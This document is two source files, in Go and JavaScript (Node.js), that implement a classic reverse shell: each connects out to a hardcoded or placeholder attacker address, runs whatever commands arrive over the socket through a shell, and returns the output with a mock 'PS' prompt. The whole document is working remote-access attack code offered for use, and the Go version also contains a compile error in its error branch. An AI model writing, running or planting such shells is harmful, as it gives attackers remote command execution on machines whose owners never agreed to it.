File: Clasic_Rever_Shell/Go/Clasic3.go
// Unix/Linux/macOS
package main

import (
    "fmt"
    "net"
    "os"
    "os/exec"
    "strings"
)

func main() {
    host := "192.168.0.8"
    port := 443

    client, err := net.Dial("tcp", fmt.Sprintf("%s:%d", host, port))
    if err != nil {
        fmt.Printf("Connection error: %v", err)
        return
    }
    defer client.Close()

    for {
        data := make([]byte, 65536)
        n, err := client.Read(data)
        if err != nil || n == 0 {
            break
        }

        command := strings.TrimSpace(string(data[:n]))

        result, err := exec.Command("sh", "-c", command).CombinedOutput()
        if err != nil {
            sendback := fmt.Sprintf("Error: %v\nPS %s> ", err, os.Getcwd())
            client.Write([]byte(sendback))
        } else {
            currentDir, _ := os.Getwd()
            sendback := fmt.Sprintf("%s\nPS %s> ", result, currentDir)
            client.Write([]byte(sendback))
        }
    }
}

File: Clasic_Rever_Shell/JavaScript/Clasic3.js
// windows (Linux/macOS)
const net = require('net');
const { exec } = require('child_process');
const path = require('path');

function main() {
    const host = 'IP_ADDRESS';
    const port = 9001;

    const client = new net.Socket();
    
    client.connect(port, host, () => {
        console.log('Connected to server');
    });

    client.on('data', (data) => {
        const command = data.toString('ascii').trim();
        
        exec(command, { timeout: 30000 }, (error, stdout, stderr) => {
            let output = stdout;
            if (stderr) {
                output += stderr;
            }

            const currentDir = process.cwd();
            let sendback = output + '\nPS ' + currentDir + '> ';

            if (error) {
                sendback = `Error: ${error.message}\nPS ${currentDir}> `;
            }

            client.write(sendback);
        });
    });

    client.on('error', (err) => {
        console.error(`Connection error: ${err}`);
    });

    client.on('close', () => {
        console.log('Connection closed');
    });
}

main();